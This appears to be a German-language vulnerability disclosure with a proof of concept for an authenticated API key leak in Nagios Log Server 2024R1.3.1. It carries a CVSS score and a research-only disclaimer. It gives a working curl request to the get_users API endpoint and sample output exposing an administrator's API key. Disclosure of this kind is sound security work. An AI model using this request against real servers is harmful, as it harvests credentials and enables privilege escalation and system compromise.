
Authentifizierte API-Schlüssel-Offenlegung in Nagios Log Server 2024R1.3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:HNur für Forschung und autorisierte Tests. Bitte nicht ohne Genehmigung gegen Systeme verwenden.
Eine Sicherheitslücke auf API-Ebene in Nagios Log Server 2024R1.3.1 erlaubt es jedem Benutzer mit einem gültigen API-Token, eine vollständige Liste der Benutzerkonten zusammen mit ihren Klartext-API-Schlüsseln abzurufen, einschließlich der Anmeldeinformationen von Administratoren. Dieser Fehler ermöglicht Benutzeraufzählung, Privilegieneskalation und eine vollständige Systemkompromittierung durch unbefugte Nutzung der offengelegten Token.
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"
[
{
"name": "devadmin",
"username": "devadmin",
"email": "[email protected]",
"apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
"auth_type": "admin",
...
}
]